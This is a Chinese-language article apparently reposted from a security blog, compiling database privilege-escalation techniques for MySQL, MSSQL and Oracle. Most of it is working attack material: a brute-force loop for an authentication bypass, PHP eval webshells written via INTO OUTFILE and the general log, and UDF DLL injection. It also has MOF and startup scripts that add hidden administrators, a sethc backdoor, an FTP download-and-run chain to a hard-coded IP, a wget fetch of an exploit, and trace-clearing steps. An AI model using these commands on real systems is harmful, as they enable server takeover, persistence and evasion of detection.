乾貨|各種資料庫提權姿勢總結(建議收藏)
「來源: |豬豬談安全 ID:zzt-anquan」
前言
資料庫許可權
在平常的滲透提權中,我們通常可以在一些特殊情況下得到資料庫的使用者名稱和密碼(最高許可權root),如下:
MySQL3306 埠弱口令爆破sqlmap注入的 ——sql-shell 模式網站的資料庫配置檔案中拿到明文密碼資訊CVE-2012-2122等這類漏洞直接拿下 MySQL 許可權
口令爆破、sqlmap的——sql-shell模式和資料庫配置檔案中拿明文密碼已經老生常談了,這裡主要演示一下CVE-2012-2122
CVE-2012-2122
當連線MariaDB/MySQL時,輸入的密碼會與期望的正確密碼比較,由於不正確的處理,會導致即便是memcmp()返回一個非零值,也會使MySQL認為兩個密碼是相同的。也就是說只要知道使用者名稱,不斷嘗試就能夠直接登入SQL資料庫。按照公告說法大約256次就能夠蒙對一次。
#受影響版本
MariaDB versions from 5。1。62, 5。2。12, 5。3。6, 5。5。23 are not。
MySQL versions from 5。1。63, 5。5。24, 5。6。6 are not。
在vunlub中啟動CVE-2012-2122環境
環境啟動後用docker ps檢視程序
可以看到啟動了一個Mysql服務(版本:5。5。23),監聽埠為3306埠,預設的root使用者的密碼為123456
我們可以使用mysql客戶端進行遠端連線資料庫
連線測試就證明我們的環境正常搭建。然後就是漏洞利用了,正常模擬攻擊者,我們是沒有密碼,不知道root的密碼為123456的,這個時候我們就可以利用CVE-2012-2122來進行身份繞過
msf可以匯出hash值
msf6> use auxiliary/scanner/mysql/mysql_authbypass_hashdumpmsf6> set rhosts 192。168。178。128msf6> run
或者直接bash輸入
root@root:~/桌面# for i in `seq 1 1000`; do mysql -u root ——password=bad -h 192。168。178。128 2>/dev/null; doneWelcome to the MariaDB monitor。 Commands endwith ; or \g。Your MySQL connection id is 854Server version: 5。5。23 Source distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others。
Type ‘help;’ or ‘\h’ for help。 Type‘\c’toclear the currentinput statement。
MySQL [(none)]>
MySQL提權
Webshell許可權
into oufile 寫 shell
into oufile 寫 shell要滿足如下條件才可以寫入
1、知道網站物理路徑2、高許可權資料庫使用者3、load_file() 開啟 即 secure_file_priv 無限制4、網站路徑有寫入許可權
資料庫檢視是否有secure_file_priv限制
mysql> show global variables like ‘%secure_file_priv%’;+——————————+————-+| Variable_name | Value |+——————————+————-+| secure_file_priv | NULL |+——————————+————-+
在 MySQL 5。5 之前 secure_file_priv 預設是空,這個情況下可以向任意絕對路徑寫檔案
在 MySQL 5。5之後 secure_file_priv 預設是 NULL,這個情況下不可以寫檔案
利用phpmyadmin來into outfile
首先在存在phpmyadmin時,我們可以試試弱口令,root、root來進行登入phpmyadmin後臺。登入進去後我們獲取網站的絕對路徑來進行寫shell
在phpmyadmin中,我們可以利用log變數來猜測網站的絕對路徑
這裡是用phpstudy搭建的網站,所以猜測網站目錄在WWW目錄下,或者透過其他手段的資訊收集,來收集到我們的網站絕對路徑。
有了網站路徑,我們就可以執行SQL命令來進行寫shell
寫入失敗,這裡失敗的原因是因為我們前面查詢secure_file_priv值為null,所以許可權就是不允許匯入或匯出,這裡我們對secure_file_priv進行修改為空後,再進行寫入。
因為secure_file_priv為只讀許可權,所以我們開啟my。ini檔案,加入如下語句再重啟伺服器。
secure_file_priv=‘’
這時檢視許可權為所有目錄下可寫入
再次寫入shell,會發現成功寫入。
然後菜刀、蟻劍進行連線。
當然我麼還可以利用sqlmap進行檔案的寫入,如下:
sqlmap -u “http://x。x。x。x/?id=x” ——file-write=“c:/Users/suifeng/Desktop/shell。php” ——file-dest=“C:/phpstudy_pro/WWW/shell。php”
當然這種寫shell的方式,在MySQL 5。5之後已經很難實現了,因為MySQL 5。5之後值為NULL,在secure_file_priv沒有匯入匯出許可權的時候,我們還可以利用日誌寫shell。
利用日誌寫shell
在MySQL 5。0 版本以上會建立日誌檔案,我們可以透過修改日誌的全域性變數中的儲存位置來 getshell
mysql> SHOW VARIABLES LIKE ‘%general%’;+——————————+————————————————————————————————-+| Variable_name | Value |+——————————+————————————————————————————————-+| general_log | OFF || general_log_file |C:\phpstudy_pro\Extensions\MySQL5。7。26\data\DESKTOP-1G2NI5V。log |+——————————+————————————————————————————————-+
general_log 預設關閉,高許可權的使用者可以直接透過mysql命令列進行開啟,開啟後日志文件記錄使用者的每條指令,將其儲存在general_log _file中。我們可以透過開啟general_log ,然後自定義general_log _file來進行getshell。
mysql>set global general_log = “ON”; #開啟general_logmysql>set global general_log_file=‘c:/phpstudy_pro/www/shell。php’; #修改general_log_file路徑
再次檢視許可權
#寫入shellmysql> select “<?php @eval($_POST[‘suifeng’]);?>”;+——————————————————-+| <?php @eval($_POST[‘suifeng’]);?> |+——————————————————-+| <?php @eval($_POST[‘suifeng’]);?> |+——————————————————-+
然後蟻劍連線
伺服器許可權
UDF提權
什麼是UDF
UDF(user-defined function)是MySQL的一個拓展介面,也可稱之為使用者自定義函式,它是用來拓展MySQL的技術手段,可以說是資料庫功能的一種擴充套件,使用者透過自定義函式來實現在MySQL中無法方便實現的功能,其新增的新函式都可以在SQL語句中呼叫,就像呼叫一些系統函式如version()函式便捷。
動態連結庫
提權大致方法是把我們的動態連結庫放置在特點的目錄下,建立我們自定義函式,實現系統函式命令的呼叫,最終導致提權。
在mysql<5。1 匯出目錄c:/windows或system32
在mysql>=5。1 匯出安裝目錄/lib/plugin/
在有注入點時候,我們可以透過sqlmap中裡的UDF動態連結庫進行匯入
#sqlmap中動態連結庫位置D:\tools\sqlmap\data\udf\mysql
裡面有windows和linux且64位和32位版本,大家可以根據被攻擊器來進行選擇
sqlmap中的動態連結庫為了防止被防毒軟體查殺,都經過了編碼處理,不能直接使用,所以我們還需要用sqlmap自帶的解碼工具clock。py進行解碼
#cloak位置D:\tools\sqlmap\extra\cloak#解碼操作D:\tools\sqlmap\extra\cloak>pythoncloak。py-d-id:\tools\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys。dll_-olib_mysqludf_sys_64。dll#windows解碼
D:\tools\sqlmap\extra\cloak>pythoncloak。py-d-id:\tools\sqlmap\data\udf\mysql\linux\64\lib_mysqludf_sys。so_-olib_mysqludf_sys_64。so#linux解碼
動態連結庫上傳位置
在上傳動態連結庫之前,我們要先對mysql的版本進行判斷
#判斷資料庫版本mysql> selectversion();+——————-+| version() |+——————-+| 5。7。26 |+——————-+
這裡被攻擊的靶機版本為5。7。26,所以我們要把動態連結庫上傳到安裝目錄/lib/plugin/下面,那我們可以利用如下命令查詢安裝目錄
mysql> show variables like ‘%plugin%’;+————————————————-+——————————————————————————+| Variable_name | Value |+————————————————-+——————————————————————————+| default_authentication_plugin | mysql_native_password || plugin_dir |C:\phpstudy_pro\Extensions\MySQL5。7。26\lib\plugin\ |+————————————————-+——————————————————————————+
mysql> select @@basedir;+————————————————————-+| @@basedir |+————————————————————-+|C:\phpstudy_pro\Extensions\MySQL5。7。26\ |+————————————————————-+
來到對應的目錄下並沒有發現/lib/plugin,所以我們需要自己建立一個/lib/plugin,但是真實環境下我們伺服器許可權還沒有拿下(這裡用是為了觀察直觀),所以我們可以在webshell環境下或者透過NTFS ADS流建立資料夾。
#NTFS ADS流建立語句mysql> select‘x’into dumpfile ‘C:/phpstudy_pro/Extensions/MySQL5。7。26/lib/plugin::$INDEX_ALLOCATION’; #建立不一定成功,不成功的情況下還是利用webshell的許可權建立目錄
建立好後我們就可以匯入我們的動態連結庫了。
匯入動態連結庫
存在sql注入時
在存在sql注入的時候,我們可以透過sqlmap來上傳動態連結庫,但是需要滿足的條件為secure_file_priv的值為空,sql注入為最高許可權,又因為 GET 有位元組長度限制,所以往往 POST 注入才可以執行這種攻擊。
python sqlmap。py -u “http://192。168。178。130/sqli-labs/Less-1/?id=1” ——file-write=“d:/tools/sqlmap/extra/cloak/lib_mysqludf_sys_64。dll” ——file-dest=“C:/phpstudy_pro/Extensions/MySQL5。7。26/lib/plugin/lib_mysqludf_sys_64。dll”
不存在sql注入時
沒有sql注入時,我們可以透過執行sql語句來進行寫入動態連結庫,這裡需要寫入檔案,所以需要secure_file_priv為空。
#select後面為動態連結庫的十六進位制編碼(資料太長,這裡省略顯示)SELECT0x4d5a900003。。。 INTODUMPFILE‘C:/phpstudy_pro/Extensions/MySQL5。7。26/lib/plugin/lib_mysqludf_sys_64。dll’;
動態連結庫的十六進位制可以透過mysql自帶的hex函式或者一些檔案十六進位制編碼器工具解決。當然在sql語句寫不進去的動態連結庫的時候,我們還可以透過我們的webshell來進行上傳。
檔案上傳完成後
我們就可以透過sql語句來自定義函數了
#原本執行程式碼CREATEFUNCTION sys_eval RETURNSSTRINGSONAME‘lib_mysqludf_sys_64。dll’;#修改後執行程式碼CREATEFUNCTION sys_eval RETURNSSTRINGSONAME‘udf。dll’;
本來應該執行這條命令來自定義命令的,但是一直報錯,後來我把dll檔名字修改之後,建立成功。(可能是下劃線導致函式在編譯情況下出問題)
#查詢自定義函式mysql> select * from mysql。func;+——————+——-+————-+——————+| name | ret | dl | type |+——————+——-+————-+——————+| sys_eval | 0 | udf。dll | function |+——————+——-+————-+——————+
#建立成功後,我們利用自定義函式進行命令執行mysql > selectsys_eval(‘whoami’);
然後用我們這個自定義命令執行函式進行提權即可。最後為了許可權維持,防止被發現,我們可以對自定義函式進行刪除。
#刪除自定義函式mysql> drop function sys_eval;
這種手工UDF提權無疑太過繁瑣,這裡主要推薦透過網頁版一鍵提權指令碼,這裡使用的是月師傅的馬,下面是下載地址
連結:https:///s/1a5ASE2TLvnKsOUxsHKBjOw 提取碼:v9s9
上傳後訪問
然後再匯入,執行命令即可
MOF提權
現在透過mof檔案來進行提權已經非常困難了,因為它支援提權版本只有2003和一些之前的版本。mof的提權原理為mof檔案每五秒就會執行,而且是系統許可權,我們透過mysql使用load_file 將檔案寫入/wbme/mof,然後系統每隔五秒就會執行一次我們上傳的MOF。MOF當中有一段是vbs指令碼,我們可以透過控制這段vbs指令碼的內容讓系統執行命令,進行提權。
mof指令碼如下
#pragma namespace(“\\\\。\\root\\subscription”)
instance of __EventFilter as $EventFilter{ EventNamespace = “Root\\Cimv2”; Name = “filtP2”; Query = “Select * From __InstanceModificationEvent ”“Where TargetInstance Isa \”Win32_LocalTime\“ ”“And TargetInstance。Second = 5”; QueryLanguage = “WQL”; };
instance of ActiveScriptEventConsumer as $Consumer{ Name = “consPCSV2”; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript。Shell\“)\nWSH。run(\”net。exe user suifeng p@ssw0rd /add\“)\nWSH。run(\”net。exe localgroup administrators suifeng /add\“)”; #建立使用者};
instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
首先我們將我們的指令碼上傳,然後用如下命令上傳到指定目錄。
selectload_file(“C:/Documents and Settings/suifeng。mof”) intodumpfile“c:/windows/system32/wbem/mof/suifeng。mof”;
然後等待五秒後用net user命令可以看到建立的使用者
mof提權痕跡清理
因為每隔幾秒鐘時間又會重新執行新增使用者的命令,所以想要清理痕跡得先暫時關閉 winmgmt 服務再刪除相關 mof 檔案
#停止winmgmt服務netstop winmgmt#刪除Repository資料夾rmdir/s /q C:\Windows\system32\wbem\Repository\#重新啟動服務netstart winmgmt
啟動項提權
MySQL的啟動項提權,原理就是透過mysql把一段vbs指令碼匯入到系統的啟動項下,如果管理員啟動或者重啟的伺服器,那麼該指令碼就會被呼叫,並執行vbs腳本里面的命令。
以下是啟動項路徑
#2003C:\Documents and Settings\Administrator\Start Menu\Programs\StartupC:\Documents andSettings\AllUsers\Start Menu\Programs\Startup#2008C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
有了路徑我們在mysql的shell下輸入如下程式碼
createtable a (cmd text); insertinto a values (“set wshshell=createobject (”“wscript。shell”“) ” ); insertinto a values (“a=wshshell。run (”“cmd。exe /c net user suifeng p@ssw0rd /add”“,0) ” ); insertinto a values (“b=wshshell。run (”“cmd。exe /c net localgroup administrators suifeng /add”“,0) ” ); select * from a intooutfile“C:\\Documents and Settings\\All Users\\「開始」選單\\程式\\啟動\\a。vbs”;
然後我們在對應路徑下就可以看到我們的vbs指令碼了
然後重啟,即可發現vbs腳本里面建立的使用者。
CVE-2016-6663、CVE-2016-6664組合提權
在一些Mysql小於5。5。51或小於5。6。32或小於5。7。14及衍生版本,我們都可以利用CVE-2016-6663、CVE-2016-6664組合對其進行測試提權。
1、利用CVE-2016-6663將www-data許可權提升為mysql許可權:
cd /var/www/html/gcc mysql-privesc-race。c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient。/mysql-privesc-race test 123456 localhost testdb
2、利用CVE-2016-6664將Mysql許可權提升為root許可權:
wget http://legalhackers。com/exploits/CVE-2016-6664/mysql-chowned。shchmod 777 mysql-chowned。sh。/mysql-chowned。sh /var/log/mysql/error。log
MSSQL提權
mssql提權前期要做的工作和mysql提權一樣,這裡就不再過多的敘述了,主要介紹一下提權方法。
mssql提權必知基本命令
select @@version#檢視資料庫版本select db_name() #檢視當前資料庫select IS_SRVROLEMEMBER(‘sysadmin’) #判斷是否為sa許可權select IS_MEMBER(‘db_owner’) #判斷是否為dba許可權exec master。。xp_msver #檢視資料庫系統引數
#開啟xp_cmdshellexec sp_configure ‘show advanced options’, 1;reconfigure;exec sp_configure ‘xp_cmdshell’,1;reconfigure;
#關閉xp_cmdshellexec sp_configure ‘showadvanced options’, 1;reconfigure;exec sp_configure ‘xp_cmdshell’, 0;reconfigure;
#禁用advanced optionsEXEC sp_configure ‘showadvanced options’,0;GO RECONFIGURE;
#sp_OACreate執行命令DECLARE @js intEXEC sp_OACreate ‘ScriptControl’,@js OUTEXEC sp_OASetProperty @js,‘Language’,‘JavaScript’ActiveXObject(“Shell。Users”);z=o。create(“user”);z。changePassword(“pass”,“”);z。setting(“AccountType”)=3;‘
#sp_OACreate移動檔案declare @aa intexec sp_oacreate ’scripting。filesystemobject‘ @aa outexec sp_oamethod @aa, ’moveFile‘,null,’c:\temp\ipmi。log‘,’c:\temp\ipmi1。log‘;
#sp_OACreate複製檔案declare @o intexec sp_oacreate ’scripting。filesystemobject‘, @o outexec sp_oamethod @o,’copyfile‘,null,’c:\windows\explorer。exe‘,’c:\windows\system32\sethc。exe‘;
#sp_OACreate刪除檔案DECLARE @ResultintDECLARE @FSO_Token intEXEC @Result = sp_OACreate ’Scripting。FileSystemObject‘, @FSO_Token OUTPUTEXEC @Result = sp_OAMethod @FSO_Token, ’DeleteFile‘,NULL,’c:\Documents and Settings\All Users\ [開始] 選單\程式\啟動\user。bat‘EXEC @Result = sp_OADestrop @FSO_Token
mssql提權必知許可權管理
1。bulkadmin:這個角色可以執行BULK INSERT語句。該語句允許從文字檔案中將資料匯入到SQL Server2008資料庫中,為需要執行大容量插入到資料庫的域帳號而設計。2。dbcreator:這個角色可以建立,更改,刪除和還原任何資料庫。不僅適合助理DBA角色,也可能適合開發人員角色。3。diskadmin:這個角色用於管理磁碟檔案,比如映象資料庫和新增備份裝置。適合助理DBA4。processadmin:SQL Server 2008可以同時多程序處理。這個角色可以結束程序(在SQL Server 2008中稱為“刪除”)5。public:有兩大特點:第一,初始狀態時沒有許可權;第二,所有資料庫使用者都是它的成員6。securityadmin:這個角色將管理登入名及其屬性。可以授權,拒絕和撤銷伺服器級/資料庫級許可權。可以重置登入名和密碼7。serveradmin:這個角色可以更改伺服器範圍的配置選項和關閉伺服器8。setupadmin:為需要管理聯接伺服器和控制啟動的儲存過程的使用者而設計。9。sysadmin:這個角色有權在SQL Server 2008 中執行任何操作。
xp_cmdshell提權
xp_cmdshell的作用類似於mysql的udf,其本質是一些sql語句的集合,xp_cmdshell也可以理解為一些危險性比較高的小指令碼。
xp_cmdshell在mssql2000中開啟,在2005之後就是預設禁止的,我們需要sa許可權來開啟xp_cmdshell
#開啟xp_cmdshellexec sp_configure ’show advanced options‘, 1;reconfigure;exec sp_configure ’xp_cmdshell‘,1;reconfigure;
#關閉開啟xp_cmdshellexec sp_configure ’show advanced options‘, 1;reconfigure;exec sp_configure ’xp_cmdshell‘, 0;reconfigure
在打開了xp_cmdshell之後,我們就可以進行執行命令了
EXEC master。dbo。xp_cmdshell ’whoami‘
sp_OACreate提權
當xp_cmdshell不可用的時候,我們還可以利用sc_oacreate來進行提權
#開啟sc_oacreateEXEC sp_configure ’show advanced options‘, 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure ’Ole Automation Procedures‘, 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure ’show advanced options‘, 0;
1)直接加使用者2000系統:declare @shell intexec sp_oacreate ’wscript。shell‘,@shell output exec sp_oamethod @shell,’run‘,null,’c:\winnt\system32\cmd。exe /c net user 123 123 /add‘declare @shell intexec sp_oacreate ’wscript。shell‘,@shell output exec sp_oamethod @shell,’run‘,null,’c:\winnt\system32\cmd。exe /c net localgroup administrators 123/add‘xp和2003系統:declare @shell intexec sp_oacreate ’wscript。shell‘,@shell output exec sp_oamethod @shell,’run‘,null,’c:\windows\system32\cmd。exe /c net user 123$ 123/add‘declare @shell intexec sp_oacreate ’wscript。shell‘,@shell output exec sp_oamethod @shell,’run‘,null,’c:\windows\system32\cmd。exe /c net localgroup administrators 123$ /add‘2)貼上鍵替換declare @o intexec sp_oacreate ’scripting。filesystemobject‘, @o out exec sp_oamethod @o, ’copyfile‘,null,’c:\windows\explorer。exe‘ ,’c:\windows\system32\sethc。exe‘;declare @o intexec sp_oacreate ’scripting。filesystemobject‘, @o out exec sp_oamethod @o, ’copyfile‘,null,’c:\windows\system32\sethc。exe‘ ,’c:\windows\system32\dllcache\sethc。exe‘;需要同時具備sp_oacreate 和sp_oamethod 兩個功能元件3)直接傳馬DECLARE @shell INT EXEC SP_OAcreate ’wscript。shell‘,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run‘,null, ’%systemroot%\system32\cmd。exe /c echo open 222。180。210。113 > cmd。txt&echo 123>> cmd。txt&echo123>> cmd。txt&echo binary >> cmd。txt&echo get 1。exe >> cmd。txt&echo bye >> cmd。txt&ftp -s:cmd。txt&1。exe&1。exe&del cmd。txt。 /q /f&del 1。exe /f /q‘——4)啟動項寫入加賬戶指令碼declare @sp_passwordxieo int, @f int, @t int, @ret intexec sp_oacreate ’scripting。filesystemobject‘, @sp_passwordxieo outexec sp_oamethod @sp_passwordxieo, ’createtextfile‘, @f out, ’d:\RECYCLER\1。vbs‘, 1exec @ret = sp_oamethod @f, ’writeline‘, NULL,’set wsnetwork=CreateObject(“WSCRIPT。NETWORK”)‘exec @ret = sp_oamethod @f, ’writeline‘, NULL,’os=“WinNT://”&wsnetwork。ComputerName‘exec @ret = sp_oamethod @f, ’writeline‘, NULL,’Set ob=GetObject(os)‘exec @ret = sp_oamethod @f, ’writeline‘, NULL,’Set oe=GetObject(os&“/Administrators,group”)‘exec @ret = sp_oamethod @f, ’writeline‘, NULL,’Set od=ob。Create(“user”,“123$”)‘exec @ret = sp_oamethod @f, ’writeline‘, NULL,’od。SetPassword “123”‘exec @ret = sp_oamethod @f, ’writeline‘, NULL,’od。SetInfo‘exec @ret = sp_oamethod @f, ’writeline‘, NULL,’Set of=GetObject(os&“/123$”,user)‘exec @ret = sp_oamethod @f, ’writeline‘, NULL,’oe。add os&“/123$”‘;5)如果該伺服器有網站,則直接用方法4)寫入一句話
沙盒提權
什麼是沙盒模式?
沙盒模式是資料庫的一種安全功能。在沙盒模式下,只對控制元件和欄位屬性中的安全且不含惡意程式碼的表示式求值。如果表示式不使用可能以某種方式損壞資料的函式或屬性,則可認為它是安全的。
利用條件:
1,Access可以呼叫VBS的函式,以System許可權執行任意命令
2,Access執行這個命令是有條件的,需要一個開關被開啟
3,這個開關在登錄檔裡
4,SA是有許可權寫登錄檔的
5,用SA寫登錄檔的許可權開啟那個開關
6,呼叫Access裡的執行命令方法,以system許可權執行任意命令執行SQL命令,執行了以下命令
開啟預設關閉的xp_regwrite儲存過程:
EXEC master。dbo。xp_regwrite ’HKEY_LOCAL_MACHINE‘,’SoftWare\Microsoft\Jet\4。0\Engines‘,’SandBoxMode‘,’REG_DWORD‘,0
利用jet。oledb執行系統命令新增系統賬號:
select * fromopenrowset(’microsoft。jet。oledb。4。0‘,’;database=c:\windows\system32\ias\dnary。mdb‘,’select shell(“whoami”)‘)
Oracle提權
Oracle許可權分配
系統許可權
系統規定使用者使用資料庫的許可權。(系統許可權是對使用者而言)。
系統許可權分類
DBA: 擁有全部特權,是系統最高許可權,只有DBA才可以建立資料庫結構。
RESOURCE:擁有Resource許可權的使用者只可以建立實體,不可以建立資料庫結構。
CONNECT:擁有Connect許可權的使用者只可以登入Oracle,不可以建立實體,不可以建立資料庫結構。
對於普通使用者:授予connect, resource許可權。
對於DBA管理使用者:授予connect,resource, dba許可權。
實體許可權
某種許可權使用者對其它使用者的表或檢視的存取許可權。(是針對表或檢視而言的)。
實體許可權分類
select, update, insert, alter, index, delete, all //all包括所有許可權
execute //執行儲存過程許可權
Oracle提權方法
透過注入儲存過程提權(低許可權提升至DBA)
原理
SYS建立的儲存過程存在sql注入。擁有create procedure許可權的使用者透過建立提權函式,將提權函式注入到儲存過程中,於是該儲存過程將呼叫這個提權函式來執行grant dba to quan命令,獲得
Oracle資料庫dba許可權
。
利用條件
1、SYS建立的儲存過程存在sql注入(EG:CVE-2005-4832)2、使用者擁有createprocedure許可權(用來建立函式)
提權步驟
假設有一個使用者quan 只有 CONNECT 和 RESOURCE 許可權
手工注入
(1)使用者登陸後執行select * from session_privs檢視許可權
(2)建立函式,命令為grant dba to quan
grant execute on pwn to public;//賦予所有使用者此函式的執行許可權
SQL>create or replace function pwn return vaarchar2authid current_user is pragma autonomous_transaction;beginexecute immediate ’grant dba to quan‘;return’‘;end;/
SQL>grant execute on pwn to public;/(3)注入sys。dbms_cdc_subscribe。activate_subscription
SQL>beginsys。dbms_cdc_subscribe。activate_subscription(’‘’||quan。pwn()||‘’‘);end;/
SQL>set role dba;(4)執行select * from session_privs檢視是否為dba許可權
利用MSF注入
(1)載入攻擊模組
use auxiliary/sqli/oracle/dbms_cdc_subscribe。activate_subscription(2)配置引數
set dbuser quan
set dbpass quan123
setsid orcl
set rhost xxxxx
setsqlgrant dba to quan(3)run
2、透過utl_http。request儲存過程提權
原理
Oracle9i~11gR2中dbms_xmlquery。newcontext()和dbms_xmlquery。getxml()函式可以執行任意PL/SQL語句,利用這兩個函式可以獲得Oracle伺服器的
作業系統許可權
。
2。2 利用條件
1、UTL_HTTP儲存過程可用2、Oracle9i~11gR2
提權步驟
(1)建立Java包
(2)建立儲存過程MYJAVACMD
(3)執行儲存過程,成功新增使用者